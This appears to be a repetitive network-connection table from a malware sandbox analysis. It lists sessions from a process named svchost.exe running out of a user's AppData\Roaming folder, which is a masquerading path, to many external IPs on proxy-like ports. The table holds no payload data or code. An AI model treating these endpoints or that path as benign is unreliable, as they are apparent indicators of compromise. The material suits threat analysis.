Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4087	192.168.2.5	62691	31.148.207.153	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4088	192.168.2.5	62699	52.151.210.204	9000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4089	192.168.2.5	55573	92.205.110.118	7895	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4090	192.168.2.5	62731	1.0.0.13	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4091	192.168.2.5	62704	184.170.245.148	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4092	192.168.2.5	62735	104.25.42.178	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4093	192.168.2.5	55489	62.103.66.18	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4094	192.168.2.5	62736	162.240.72.139	37445	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4095	192.168.2.5	62811	91.231.186.133	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4096	192.168.2.5	62812	91.231.186.133	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4097	192.168.2.5	62733	165.227.196.37	53718	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4098	192.168.2.5	62813	91.231.186.133	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4099	192.168.2.5	62816	91.231.186.133	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4100	192.168.2.5	62700	37.18.73.60	5566	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4101	192.168.2.5	62627	117.160.250.138	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4102	192.168.2.5	62714	147.75.34.86	10010	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4103	192.168.2.5	55540	91.134.140.160	48962	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4104	192.168.2.5	55538	91.134.140.160	20896	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4105	192.168.2.5	62725	45.120.178.197	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4106	192.168.2.5	62766	162.243.102.207	9764	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4107	192.168.2.5	62724	139.99.148.90	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4108	192.168.2.5	62779	162.241.79.22	35318	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4109	192.168.2.5	62713	103.127.1.130	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4110	192.168.2.5	62777	198.23.176.76	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4111	192.168.2.5	62732	8.219.177.134	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4112	192.168.2.5	62744	220.248.70.237	9002	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4113	192.168.2.5	55865	187.49.191.14	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4114	192.168.2.5	62753	43.163.192.3	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4115	192.168.2.5	62773	73.151.59.35	20816	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4116	192.168.2.5	62806	104.20.225.218	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4117	192.168.2.5	62674	36.134.91.82	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4118	192.168.2.5	62746	62.33.53.248	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4119	192.168.2.5	62763	154.12.178.107	29985	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4120	192.168.2.5	62377	193.239.58.92	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4121	192.168.2.5	62810	38.162.15.98	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4122	192.168.2.5	62356	217.112.80.252	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4123	192.168.2.5	62786	203.96.177.211	55005	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4124	192.168.2.5	62618	198.8.84.3	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4125	192.168.2.5	56129	162.214.170.144	25347	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4126	192.168.2.5	62808	82.113.157.122	31280	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4127	192.168.2.5	62796	194.163.137.106	9050	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4128	192.168.2.5	62790	35.154.71.72	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4129	192.168.2.5	62835	185.162.229.215	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4130	192.168.2.5	62800	159.223.71.71	59159	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4131	192.168.2.5	62818	60.246.122.244	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4132	192.168.2.5	62904	43.153.71.58	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4133	192.168.2.5	62906	43.153.71.58	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4134	192.168.2.5	62907	43.153.71.58	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4135	192.168.2.5	62908	43.153.71.58	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4136	192.168.2.5	62819	47.243.205.1	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4137	192.168.2.5	62853	172.64.80.55	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4138	192.168.2.5	62857	104.20.67.113	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4139	192.168.2.5	62839	158.69.53.98	9300	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4140	192.168.2.5	62843	162.159.246.135	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4141	192.168.2.5	62865	172.67.105.234	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4142	192.168.2.5	62822	43.131.242.162	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4143	192.168.2.5	62875	104.19.79.238	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4144	192.168.2.5	62827	178.54.21.203	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4145	192.168.2.5	62880	104.21.223.181	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4146	192.168.2.5	62831	45.179.71.90	3180	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4147	192.168.2.5	62889	162.159.241.5	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4148	192.168.2.5	62828	49.228.131.169	5000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4149	192.168.2.5	62435	165.227.104.122	41443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4150	192.168.2.5	62840	18.135.133.116	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4151	192.168.2.5	62898	104.23.125.117	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4152	192.168.2.5	62740	117.160.250.131	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4153	192.168.2.5	62883	38.162.3.175	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4154	192.168.2.5	62870	130.162.213.175	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4155	192.168.2.5	62918	50.63.12.33	61464	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4156	192.168.2.5	62845	103.36.35.135	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4157	192.168.2.5	62646	23.225.72.122	3500	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4158	192.168.2.5	63007	202.159.19.213	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4159	192.168.2.5	62881	132.226.7.23	30277	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4160	192.168.2.5	63010	202.159.19.213	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4161	192.168.2.5	62867	111.90.150.109	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4162	192.168.2.5	63011	202.159.19.213	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4163	192.168.2.5	62940	104.16.143.127	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4164	192.168.2.5	62941	172.67.181.149	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4165	192.168.2.5	62944	104.25.231.184	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4166	192.168.2.5	63012	202.159.19.213	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4167	192.168.2.5	62945	172.67.181.11	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4168	192.168.2.5	62946	198.8.84.3	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4169	192.168.2.5	62899	147.75.92.251	10006	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4170	192.168.2.5	63034	202.159.35.189	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4171	192.168.2.5	63036	202.159.35.189	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4172	192.168.2.5	62961	104.20.56.71	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4173	192.168.2.5	63038	202.159.35.189	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4174	192.168.2.5	63040	202.159.35.189	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4175	192.168.2.5	62976	104.16.105.15	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4176	192.168.2.5	62892	161.97.163.52	22040	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4177	192.168.2.5	62926	43.163.192.3	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4178	192.168.2.5	62925	177.234.244.174	32213	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4179	192.168.2.5	62923	13.40.239.130	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4180	192.168.2.5	62984	23.227.38.198	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4181	192.168.2.5	62995	104.25.244.70	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4182	192.168.2.5	62997	104.16.105.182	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4183	192.168.2.5	62909	185.81.153.162	3389	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4184	192.168.2.5	62912	77.91.74.77	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4185	192.168.2.5	62884	103.190.54.141	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4186	192.168.2.5	62949	154.12.178.107	29985	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4187	192.168.2.5	63009	159.89.138.130	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4188	192.168.2.5	62983	23.152.40.15	5050	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4189	192.168.2.5	63006	104.18.254.76	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4190	192.168.2.5	62951	162.55.87.48	5566	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4191	192.168.2.5	63025	47.88.3.19	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4192	192.168.2.5	62879	122.114.232.137	808	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4193	192.168.2.5	63046	104.21.85.109	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4194	192.168.2.5	62975	82.64.77.30	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4195	192.168.2.5	63056	104.23.141.196	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4196	192.168.2.5	63069	104.19.138.4	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4197	192.168.2.5	62969	51.83.184.241	9191	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4198	192.168.2.5	62993	163.172.137.49	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4199	192.168.2.5	63162	202.159.60.65	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4200	192.168.2.5	63170	202.159.60.65	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4201	192.168.2.5	63169	41.86.252.91	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4202	192.168.2.5	63171	202.159.60.65	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4203	192.168.2.5	63172	41.86.252.91	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4204	192.168.2.5	62974	8.222.152.158	55555	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4205	192.168.2.5	63173	202.159.60.65	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4206	192.168.2.5	62955	103.127.1.130	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4207	192.168.2.5	63003	82.113.157.122	31280	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4208	192.168.2.5	63174	41.86.252.91	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4209	192.168.2.5	62979	61.133.66.69	9002	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4210	192.168.2.5	63176	41.86.252.91	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4211	192.168.2.5	63077	104.16.107.206	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4212	192.168.2.5	62973	93.90.212.2	4153	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4213	192.168.2.5	63072	162.159.242.230	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4214	192.168.2.5	62967	46.241.57.29	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4215	192.168.2.5	63024	104.249.29.74	5767	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4216	192.168.2.5	63027	164.163.133.130	999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4217	192.168.2.5	62675	79.110.196.145	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4218	192.168.2.5	63030	18.185.169.150	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4219	192.168.2.5	63031	60.246.122.244	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4220	192.168.2.5	63118	203.30.191.34	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4221	192.168.2.5	62696	222.220.102.159	8000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4222	192.168.2.5	63041	94.45.74.60	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4223	192.168.2.5	63146	104.16.25.216	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4224	192.168.2.5	63043	187.40.1.122	128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4225	192.168.2.5	63000	124.160.118.183	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4226	192.168.2.5	62721	51.79.87.144	41230	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4227	192.168.2.5	63138	104.16.108.42	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4228	192.168.2.5	63159	172.67.69.9	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

